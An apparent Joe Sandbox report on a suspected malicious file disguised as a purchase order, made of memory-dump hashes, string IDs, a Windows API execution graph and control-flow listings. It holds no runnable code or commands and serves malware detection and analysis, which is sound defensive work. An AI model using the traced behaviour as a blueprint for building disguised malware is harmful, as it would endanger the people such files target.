                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96d611f62f98b937ef999029d141e3e751282df3a08d007a7812c8c07f8aa347
                                                        • Instruction ID: d8de4107f4fc7f033bbb8873326ca6ba48531efd0c7b19e17cabcd50d3d780d6
                                                        • Opcode Fuzzy Hash: 96d611f62f98b937ef999029d141e3e751282df3a08d007a7812c8c07f8aa347
                                                        • Instruction Fuzzy Hash: BEB012B00AB404EFC200162C840C138B575EB4130272018A0610FCE0E1C7100800FE00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2222239885
                                                        • Opcode ID: 71fabb7d97039ac8614f4d9c2ba60f4b8b5b4d536042c60b485c7959e6d1c896
                                                        • Instruction ID: 6db9446d62980a8fd0749314f76ced03650fdc4d33c0e93aa5e84cc076ae4d1d
                                                        • Opcode Fuzzy Hash: 71fabb7d97039ac8614f4d9c2ba60f4b8b5b4d536042c60b485c7959e6d1c896
                                                        • Instruction Fuzzy Hash: 8E123C34A40219CFDB28DF69C954A9DB7F2BF84304F2485A9D40AAB764DB309D85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 7edfd9364a9d6c6d50c2e85aa61cac86a34405105c487903ecf5339d23138524
                                                        • Instruction ID: 569f854f5029c0d8957b9ef756a0be2a257df6e02bf47cf08bda46687e19daa4
                                                        • Opcode Fuzzy Hash: 7edfd9364a9d6c6d50c2e85aa61cac86a34405105c487903ecf5339d23138524
                                                        • Instruction Fuzzy Hash: 26323F35E5071A8FCB15EF75C85459DB7B2FF89300F20C6AAD449AB264EF30A985CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: 000fae08864b529ffc217c22e409f21eaefcb42f0e0325a3a781f92124054bb8
                                                        • Instruction ID: a08d50cb404554319f0227f8e95adbec3f9149e2f19a859f2f3f0583f7ffbc55
                                                        • Opcode Fuzzy Hash: 000fae08864b529ffc217c22e409f21eaefcb42f0e0325a3a781f92124054bb8
                                                        • Instruction Fuzzy Hash: 3402AD35B006059FDB14DF68E9906AEB7E2FF88304F148529E805DB7A5DB31EC86CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8b20140d51e4a763f70d67721a758efd851e6712c514d2dd2d66d92ecd9f796
                                                        • Instruction ID: 66c9f9324d64f7e65d05db9d836e5ac479d59aabba083634cce80bd809ded55f
                                                        • Opcode Fuzzy Hash: a8b20140d51e4a763f70d67721a758efd851e6712c514d2dd2d66d92ecd9f796
                                                        • Instruction Fuzzy Hash: 4B53F731D10B1A8ACB51EF68C880599F7B1FF99300F51D79AE458B7221FB70AAD5CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6da0dd71f1097004b92a85fb20126bbcd930dcc7b6c9dadb5e3bce88059b2ff8
                                                        • Instruction ID: 6d6c2bde9f245443606db7fdbd13fd6760c07c5421a0ed4af7619261ddca87a8
                                                        • Opcode Fuzzy Hash: 6da0dd71f1097004b92a85fb20126bbcd930dcc7b6c9dadb5e3bce88059b2ff8
                                                        • Instruction Fuzzy Hash: 95232E31D10B198ECB11EF68C8806ADF7B1FF99300F55D79AE459A7221EB70AAC5CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 7f50d401d852ebca61bec5a5f93652bf653c26c90d769f788ce54247876e2358
                                                        • Instruction ID: c832320c05101a479080a34ef92d85fa3e5188eaeb14e659138df2f9d8e2b66f
                                                        • Opcode Fuzzy Hash: 7f50d401d852ebca61bec5a5f93652bf653c26c90d769f788ce54247876e2358
                                                        • Instruction Fuzzy Hash: 5622B070B101058FCB14DB38D594AAEB7F2EB89310F148569E407DB7A6DB31DC868B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e87186d2a9af91506be2db83318d0777e416679c8120dbff98ea9f590edb7015
                                                        • Instruction ID: aa456c55f4faa4fdd56825293c5d18bfcdbe9cb9e5eb2142527d0a7e0f648e44
                                                        • Opcode Fuzzy Hash: e87186d2a9af91506be2db83318d0777e416679c8120dbff98ea9f590edb7015
                                                        • Instruction Fuzzy Hash: B3A22434A402088FDB24CF68C594A9DBBF2FB49314F5584AAE849EB765DB35EC85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8422f1b287d4cc8c563820300bd2735504ca5d2d08623234f1400ecf01d92692
                                                        • Instruction ID: 038aff3f7b7547bf3a79137bce313f74111da145990b09c6711b3f22a26f03c9
                                                        • Opcode Fuzzy Hash: 8422f1b287d4cc8c563820300bd2735504ca5d2d08623234f1400ecf01d92692
                                                        • Instruction Fuzzy Hash: 0F329F74F10209DFDB14DB69D990BADB7B6EB88310F148529E406EB395DB31EC42CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 019c80e2ee91792e6b251f01d5c8f083726cff44db34c4637c3b31588393e781
                                                        • Instruction ID: 8d140c08558cfc716197ad06f3dd62d06be0625693909c986a6bff5ae7fc580f
                                                        • Opcode Fuzzy Hash: 019c80e2ee91792e6b251f01d5c8f083726cff44db34c4637c3b31588393e781
                                                        • Instruction Fuzzy Hash: 0DE11EB4E102198FCB14DFA9C5809AEFBB2FF49305F249159E415A739AD730A941CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 698519ec2fda93824f73bca4158a89cb845edf5d9642bbbf638b07ee448a3199
                                                        • Instruction ID: 2398b31119158d9294cb8ac329aeedd9b2dfd51c9ab4596904ed53fe704460ff
                                                        • Opcode Fuzzy Hash: 698519ec2fda93824f73bca4158a89cb845edf5d9642bbbf638b07ee448a3199
                                                        • Instruction Fuzzy Hash: 27E10DB4E006198FCB14DF99C5809AEFBF2FF49305F248169E415AB35ADB31A941CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1c1dd95c029f31c91a102290635b140532a9792527cc0237fe6c9f87c6ee191
                                                        • Instruction ID: 07280c5845cb4f5f2503ef944b780588162c44834109cefc3645e5c2814205b9
                                                        • Opcode Fuzzy Hash: c1c1dd95c029f31c91a102290635b140532a9792527cc0237fe6c9f87c6ee191
                                                        • Instruction Fuzzy Hash: 98E11CB4E102198FCB14DFA9C5809AEFBF2FF89305F249159E415AB35AD730A941CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73f1fc93adbbd05ccf6b8b3a002ac1b9596d56b5de1220eb60e3241cab2c64d5
                                                        • Instruction ID: 82e401770f7cd95db1db904cb2a6a7abdcf784511d9b15fb5a467ab9243e8a99
                                                        • Opcode Fuzzy Hash: 73f1fc93adbbd05ccf6b8b3a002ac1b9596d56b5de1220eb60e3241cab2c64d5
                                                        • Instruction Fuzzy Hash: 2DE12DB4E102198FCB14DFA9C5909AEFBB2FF49305F248169E415AB35AD731AD41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4320256d6ed9c1c1e12d2d8697aaf29f4d94a17793d039c4a1977fc83636e346
                                                        • Instruction ID: eed2fdc3f5d6f0d6ebc97fb99eff2d337d307c2fbe9f6c6526a2a56e7b280de5
                                                        • Opcode Fuzzy Hash: 4320256d6ed9c1c1e12d2d8697aaf29f4d94a17793d039c4a1977fc83636e346
                                                        • Instruction Fuzzy Hash: 69E10DB4E102198FCB14DFA9C5809AEFBF2FF49305F249159E415AB39AD731A941CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49c903a10bfa4eae78ab6f3e8846bf45d4668ae1b1a1b44c26d851cea3efda36
                                                        • Instruction ID: df72c84dee8021d30c9f73a3a764288b23373eba8084fd652b7d02741b56b8bf
                                                        • Opcode Fuzzy Hash: 49c903a10bfa4eae78ab6f3e8846bf45d4668ae1b1a1b44c26d851cea3efda36
                                                        • Instruction Fuzzy Hash: 09A14936E00215CFCF09DFA9C8405AEB7B2FF85300B2545AFE805AB265DB35E956CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8265bc655f2248057acabe4d08486d86fb34957558acfafe135be9864eb9632
                                                        • Instruction ID: bcd46ba75d7da4440ff5ca3b00190d9a128b91a361a0167fd2115659298ad655
                                                        • Opcode Fuzzy Hash: e8265bc655f2248057acabe4d08486d86fb34957558acfafe135be9864eb9632
                                                        • Instruction Fuzzy Hash: CD811AB5D1420A9FDF21CFA9C880AAEBBB1FB49320F14846AE446E7351D335DD81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35b47c6472644bdd580aa3867a923caa4ff716ffecb73734411a9c22fc451cdb
                                                        • Instruction ID: 8b66a65435ac2cf8200531a6a946e7bf59c5f607fd91a236b7cc00cb0a1b8510
                                                        • Opcode Fuzzy Hash: 35b47c6472644bdd580aa3867a923caa4ff716ffecb73734411a9c22fc451cdb
                                                        • Instruction Fuzzy Hash: A0617FB0E102198FDB15DFAAC5405AEBBB2FF89304F24C16AD408AB356D7309D42CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 822423c12a502f366c655b7a870284798eadff84cfefb127f65cd3e24641a49b
                                                        • Instruction ID: 60dbb3717deae798abb5ccff15a24cb65a286ae5c50b7e9f50efb3ba19678d0c
                                                        • Opcode Fuzzy Hash: 822423c12a502f366c655b7a870284798eadff84cfefb127f65cd3e24641a49b
                                                        • Instruction Fuzzy Hash: 9B511CB0E006198FCB14DFA9C5805AEFBF2BF89314F24C169D419AB356D7315942CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1535990e479ec5b8554360e08a4875571f2768b32531b7fef2907beb0772229
                                                        • Instruction ID: baeb0f6b8a0eb2d1475a8d6f1c53b18d9ba88d1d1acdd66f22fb379ff7022de9
                                                        • Opcode Fuzzy Hash: f1535990e479ec5b8554360e08a4875571f2768b32531b7fef2907beb0772229
                                                        • Instruction Fuzzy Hash: DB512BB0E116198FCB14DFA9C9805AEFBF2BF89304F24C169D418A7356D7319942CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-390881366
                                                        • Opcode ID: 7fda244277b8c2e1331736257f5659243c20b066d946a87f6ca2f365db01f4b8
                                                        • Instruction ID: abb626efe60278907d6302ec16d99cba7cf05244d936e8d4a8849bfed6d42ee1
                                                        • Opcode Fuzzy Hash: 7fda244277b8c2e1331736257f5659243c20b066d946a87f6ca2f365db01f4b8
                                                        • Instruction Fuzzy Hash: 2BF13D38A41208CFCB59EF69D594A6EB7B2BF94340F24842DD4059B769DB31EC86CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 343d8f5048c65cf2d3c11c7b988e7c3b53f4c7de7cdaed2c78909b38dc701742
                                                        • Instruction ID: 89da4c74268b3909a4248a718943ca1a6d8148839a688e865cb74ba4576d400c
                                                        • Opcode Fuzzy Hash: 343d8f5048c65cf2d3c11c7b988e7c3b53f4c7de7cdaed2c78909b38dc701742
                                                        • Instruction Fuzzy Hash: AAB15C34A416188FDB14EFA9E59069EBBB2FF84301F24842DE405DB7A5DB74DC86CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q$LR^q$$^q$$^q
                                                        • API String ID: 0-2454687669
                                                        • Opcode ID: 233bc1fd4c2706c25dcd23c5ac81544818bcf7b78c76be1a825e73c80b2e2529
                                                        • Instruction ID: 6d22bb0a1cb5ad3a5107b3641f0e2203c14754f9e3cab6d5bab99d11744de865
                                                        • Opcode Fuzzy Hash: 233bc1fd4c2706c25dcd23c5ac81544818bcf7b78c76be1a825e73c80b2e2529
                                                        • Instruction Fuzzy Hash: 3851BE34B406059FCB19EF2CE940A6EB7E2FF89340F108569E4069B7A9DB31EC45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:135
                                                        Total number of Limit Nodes:7
                                                        execution_graph 48532 1084668 48533 108467a 48532->48533 48534 1084686 48533->48534 48536 1084778 48533->48536 48537 108479d 48536->48537 48541 1084878 48537->48541 48545 1084888 48537->48545 48543 10848af 48541->48543 48542 108498c 48542->48542 48543->48542 48549 108449c 48543->48549 48547 10848af 48545->48547 48546 108498c 48546->48546 48547->48546 48548 108449c CreateActCtxA 48547->48548 48548->48546 48550 1085918 CreateActCtxA 48549->48550 48552 10859db 48550->48552 48579 108ad78 48580 108ad87 48579->48580 48583 108ae60 48579->48583 48591 108ae70 48579->48591 48584 108ae81 48583->48584 48585 108aea4 48583->48585 48584->48585 48599 108b108 48584->48599 48603 108b0f8 48584->48603 48585->48580 48586 108ae9c 48586->48585 48587 108b0a8 GetModuleHandleW 48586->48587 48588 108b0d5 48587->48588 48588->48580 48592 108ae81 48591->48592 48593 108aea4 48591->48593 48592->48593 48597 108b108 LoadLibraryExW 48592->48597 48598 108b0f8 LoadLibraryExW 48592->48598 48593->48580 48594 108ae9c 48594->48593 48595 108b0a8 GetModuleHandleW 48594->48595 48596 108b0d5 48595->48596 48596->48580 48597->48594 48598->48594 48600 108b11c 48599->48600 48602 108b141 48600->48602 48607 108a8b0 48600->48607 48602->48586 48604 108b11c 48603->48604 48605 108b141 48604->48605 48606 108a8b0 LoadLibraryExW 48604->48606 48605->48586 48606->48605 48608 108b2e8 LoadLibraryExW 48607->48608 48610 108b361 48608->48610 48610->48602 48611 108d0f8 48612 108d13e GetCurrentProcess 48611->48612 48614 108d190 GetCurrentThread 48612->48614 48616 108d189 48612->48616 48615 108d1cd GetCurrentProcess 48614->48615 48618 108d1c6 48614->48618 48617 108d203 48615->48617 48616->48614 48619 108d22b GetCurrentThreadId 48617->48619 48618->48615 48620 108d25c 48619->48620 48621 5051cf0 48622 5051d58 CreateWindowExW 48621->48622 48624 5051e14 48622->48624 48624->48624 48523 736b920 FindCloseChangeNotification 48524 736b987 48523->48524 48525 7368be0 48526 7368d6b 48525->48526 48527 7368c06 48525->48527 48527->48526 48529 736620c 48527->48529 48530 7368e60 PostMessageW 48529->48530 48531 7368ecc 48530->48531 48531->48527 48625 ead01c 48626 ead034 48625->48626 48627 ead08e 48626->48627 48632 5050ad4 48626->48632 48641 5051ea8 48626->48641 48645 5052c08 48626->48645 48654 5051e97 48626->48654 48633 5050adf 48632->48633 48634 5052c79 48633->48634 48636 5052c69 48633->48636 48674 5050bfc 48634->48674 48658 5052e6c 48636->48658 48664 5052da0 48636->48664 48669 5052d91 48636->48669 48637 5052c77 48642 5051ece 48641->48642 48643 5050ad4 CallWindowProcW 48642->48643 48644 5051eef 48643->48644 48644->48627 48648 5052c45 48645->48648 48646 5052c79 48647 5050bfc CallWindowProcW 48646->48647 48650 5052c77 48647->48650 48648->48646 48649 5052c69 48648->48649 48651 5052d91 CallWindowProcW 48649->48651 48652 5052da0 CallWindowProcW 48649->48652 48653 5052e6c CallWindowProcW 48649->48653 48651->48650 48652->48650 48653->48650 48655 5051ece 48654->48655 48656 5050ad4 CallWindowProcW 48655->48656 48657 5051eef 48656->48657 48657->48627 48659 5052e2a 48658->48659 48660 5052e7a 48658->48660 48678 5052e47 48659->48678 48681 5052e58 48659->48681 48661 5052e40 48661->48637 48665 5052db4 48664->48665 48667 5052e47 CallWindowProcW 48665->48667 48668 5052e58 CallWindowProcW 48665->48668 48666 5052e40 48666->48637 48667->48666 48668->48666 48670 5052db4 48669->48670 48672 5052e47 CallWindowProcW 48670->48672 48673 5052e58 CallWindowProcW 48670->48673 48671 5052e40 48671->48637 48672->48671 48673->48671 48675 5050c07 48674->48675 48676 505435a CallWindowProcW 48675->48676 48677 5054309 48675->48677 48676->48677 48677->48637 48679 5052e69 48678->48679 48684 505429b 48678->48684 48679->48661 48682 5052e69 48681->48682 48683 505429b CallWindowProcW 48681->48683 48682->48661 48683->48682 48685 5050bfc CallWindowProcW 48684->48685 48686 50542aa 48685->48686 48686->48679 48521 108d340 DuplicateHandle 48522 108d3d6 48521->48522 48553 5058568 48554 5058595 48553->48554 48557 5058154 48554->48557 48556 505861a 48558 505815f 48557->48558 48559 505ba20 48558->48559 48562 5093b18 48558->48562 48569 5093b0a 48558->48569 48559->48556 48563 5093b3c 48562->48563 48564 5093b43 48562->48564 48563->48559 48568 5093b6a 48564->48568 48575 509083c 48564->48575 48567 509083c GetCurrentThreadId 48567->48568 48568->48559 48570 5093b18 48569->48570 48571 509083c GetCurrentThreadId 48570->48571 48574 5093b3c 48570->48574 48572 5093b60 48571->48572 48573 509083c GetCurrentThreadId 48572->48573 48573->48574 48574->48559 48576 5090847 48575->48576 48577 5093e7f GetCurrentThreadId 48576->48577 48578 5093b60 48576->48578 48577->48578 48578->48567

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 108d0e8-108d0f0 295 108d0aa-108d0e7 294->295 296 108d0f2-108d187 GetCurrentProcess 294->296 304 108d189-108d18f 296->304 305 108d190-108d1c4 GetCurrentThread 296->305 304->305 306 108d1cd-108d201 GetCurrentProcess 305->306 307 108d1c6-108d1cc 305->307 309 108d20a-108d225 call 108d2c8 306->309 310 108d203-108d209 306->310 307->306 314 108d22b-108d25a GetCurrentThreadId 309->314 310->309 315 108d25c-108d262 314->315 316 108d263-108d2c5 314->316 315->316
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D176
                                                        • GetCurrentThread.KERNEL32 ref: 0108D1B3
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D1F0
                                                        • GetCurrentThreadId.KERNEL32 ref: 0108D249
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID: 4'^q
                                                        • API String ID: 2063062207-1614139903
                                                        • Opcode ID: 0fd2c66052e07ef7ab53fca16e266f924322a1964f7be8349216909517473381
                                                        • Instruction ID: c07ef30dc39e096157f73d4103985c3d1e3172b6ccc83493e578ae8cb0b29097
                                                        • Opcode Fuzzy Hash: 0fd2c66052e07ef7ab53fca16e266f924322a1964f7be8349216909517473381
                                                        • Instruction Fuzzy Hash: 126168B09043099FDB04DFAAD548BAEBBF1FF48304F208599E049A73A0DB309984CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 323 108d0f8-108d187 GetCurrentProcess 327 108d189-108d18f 323->327 328 108d190-108d1c4 GetCurrentThread 323->328 327->328 329 108d1cd-108d201 GetCurrentProcess 328->329 330 108d1c6-108d1cc 328->330 332 108d20a-108d225 call 108d2c8 329->332 333 108d203-108d209 329->333 330->329 336 108d22b-108d25a GetCurrentThreadId 332->336 333->332 337 108d25c-108d262 336->337 338 108d263-108d2c5 336->338 337->338
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D176
                                                        • GetCurrentThread.KERNEL32 ref: 0108D1B3
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D1F0
                                                        • GetCurrentThreadId.KERNEL32 ref: 0108D249
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 2b0eb70bb635a15f0efaece074524ea2908c534361df025b42f1ee02534b8a63
                                                        • Instruction ID: 7e3579cf0460f9faa08e09aca5910cb6be833f9d7f701758dab674b32942f06b
                                                        • Opcode Fuzzy Hash: 2b0eb70bb635a15f0efaece074524ea2908c534361df025b42f1ee02534b8a63
                                                        • Instruction Fuzzy Hash: 315144B09043099FDB14DFAAD548BAEBBF1BF88314F208459E459A73A0DB349984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
